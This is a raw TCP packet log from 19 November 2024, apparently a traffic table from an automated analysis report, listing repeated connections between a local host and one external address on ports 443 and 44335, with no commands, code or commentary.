                                                                                                                                          Nov 19, 2024 18:57:27.391722918 CET4433550037212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:27.612159967 CET4433550037212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:27.635761023 CET5003744335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:27.636639118 CET5003744335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:27.637614012 CET5003744335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:27.637712002 CET5003744335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:27.640597105 CET4433550037212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:27.641483068 CET4433550037212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:27.642504930 CET4433550037212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:27.642699957 CET4433550037212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:27.642821074 CET5003744335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.041306019 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.041371107 CET44350040212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:28.041462898 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.042828083 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.042845011 CET44350040212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:28.836630106 CET44350040212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:28.836700916 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.838078022 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.838098049 CET44350040212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:28.838463068 CET44350040212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:28.839492083 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.839894056 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.839905024 CET44350040212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:28.840775013 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.840863943 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.840961933 CET44350040212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:28.841002941 CET44350040212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:28.841020107 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.841046095 CET50040443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.950437069 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.950486898 CET44350043212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:28.950581074 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.951622963 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:28.951639891 CET44350043212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:29.745306969 CET44350043212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:29.745676041 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.748625040 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.748646975 CET44350043212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:29.748976946 CET44350043212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:29.750756025 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.751395941 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.751422882 CET44350043212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:29.751544952 CET44350043212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:29.751579046 CET44350043212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:29.751583099 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.751594067 CET44350043212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:29.751615047 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.751661062 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.751661062 CET50043443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.891799927 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.891844988 CET44350046212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:29.892405987 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.892405987 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:29.892452955 CET44350046212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.700654984 CET44350046212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.700752020 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.702325106 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.702348948 CET44350046212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.702722073 CET44350046212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.703768015 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.703995943 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.704026937 CET44350046212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.704087019 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.704166889 CET44350046212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.704205036 CET44350046212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.704267025 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.704267025 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.724792957 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.724855900 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.724937916 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.725796938 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.725820065 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.521681070 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.521765947 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.523597956 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.523610115 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.523919106 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.526885986 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.527270079 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.527292967 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.527412891 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.527446985 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.527488947 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.662506104 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.687154055 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.687191963 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.687325001 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.687931061 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.687943935 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.486083984 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.486191034 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.487607956 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.487617970 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.487885952 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.488776922 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.489347935 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.489378929 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.489440918 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.489489079 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.489520073 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.489577055 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.489593029 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.498193979 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.498254061 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.498312950 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.498743057 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.498756886 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.293648005 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.293730021 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.295248985 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.295258999 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.295504093 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.296304941 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.296562910 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.296588898 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.296686888 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.296715021 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.296772003 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.418287039 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.430294037 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.430339098 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.430447102 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.431103945 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.431121111 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.259682894 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.259764910 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.261343002 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.261353016 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.261728048 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.262774944 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.262999058 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.263041973 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.263133049 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.325016022 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.342195034 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.348448038 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.348570108 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.349225044 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.354589939 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042474031 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042608976 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042618990 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042661905 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042671919 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042731047 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.043309927 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.128778934 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.132534027 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.137293100 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.352468967 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.353288889 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.354269028 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.355549097 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.355695009 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.358311892 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.359101057 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.360405922 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.360884905 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.363284111 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.374186993 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.374231100 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.374310017 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.374702930 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.374713898 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.351874113 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.351943016 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.353626966 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.353634119 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.353887081 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.354587078 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356148005 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356194973 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.356301069 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.356324911 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356331110 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.356340885 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.356358051 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356391907 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356446028 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.673823118 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.673878908 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.673959017 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.674426079 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.674442053 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.472208023 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.472286940 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.474080086 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.474097967 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.474386930 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.475370884 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.475513935 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.475544930 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.475609064 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.607836962 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.616436958 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.616487980 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.616729975 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.617480993 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.617495060 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:38.436091900 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:38.436167955 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:38.440097094 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:38.440119982 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:38.440395117 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:38.441251993 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:38.442675114 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:38.442708969 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:38.442847967 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:38.442877054 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:38.442928076 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:38.442981958 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:38.849632025 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:38.849684954 CET44350073212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:38.849760056 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:38.854135036 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:38.854154110 CET44350073212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:39.687892914 CET44350073212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:39.688033104 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.689445972 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.689460039 CET44350073212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:39.689712048 CET44350073212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:39.690779924 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.691679001 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.691730976 CET44350073212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:39.691780090 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.691875935 CET44350073212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:39.691905975 CET44350073212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:39.691940069 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.691998005 CET50073443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.801405907 CET50076443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.801465988 CET44350076212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:39.801676035 CET50076443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.802443027 CET50076443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:39.802459955 CET44350076212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:40.607975960 CET44350076212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:40.608068943 CET50076443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:40.609740019 CET50076443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:40.609755039 CET44350076212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:40.610011101 CET44350076212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:40.610804081 CET50076443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:40.611469984 CET50076443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:40.611496925 CET44350076212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:40.611601114 CET44350076212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:40.611632109 CET44350076212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:40.611679077 CET50076443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:40.611773968 CET50076443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:40.739275932 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:40.739337921 CET44350079212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:40.739420891 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:40.740050077 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:40.740070105 CET44350079212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:41.454211950 CET44350079212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:41.454447985 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.465289116 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.465311050 CET44350079212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:41.465626001 CET44350079212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:41.473052979 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.489284992 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.489337921 CET44350079212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:41.489500999 CET44350079212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:41.489530087 CET44350079212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:41.489593983 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.489593983 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.489603996 CET44350079212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:41.489646912 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.489646912 CET50079443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.581933022 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.581978083 CET44350082212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:41.582150936 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.584045887 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:41.584067106 CET44350082212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:42.387195110 CET44350082212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:42.387301922 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.388648033 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.388659954 CET44350082212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:42.388890028 CET44350082212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:42.389588118 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.391099930 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.391125917 CET44350082212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:42.391191959 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.391242027 CET44350082212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:42.391269922 CET44350082212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:42.391324997 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.391324997 CET50082443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.465682030 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.465749025 CET44350085212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:42.466593027 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.467343092 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:42.467381001 CET44350085212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:43.263093948 CET44350085212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:43.263338089 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:43.281431913 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:43.281454086 CET44350085212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:43.281874895 CET44350085212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:43.282735109 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:43.283339977 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:43.283377886 CET44350085212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:43.283426046 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:43.283548117 CET44350085212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:43.283596992 CET44350085212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:43.283642054 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:43.283678055 CET50085443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:43.402100086 CET50088443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:43.402160883 CET44350088212.193.169.65192.168.2.5
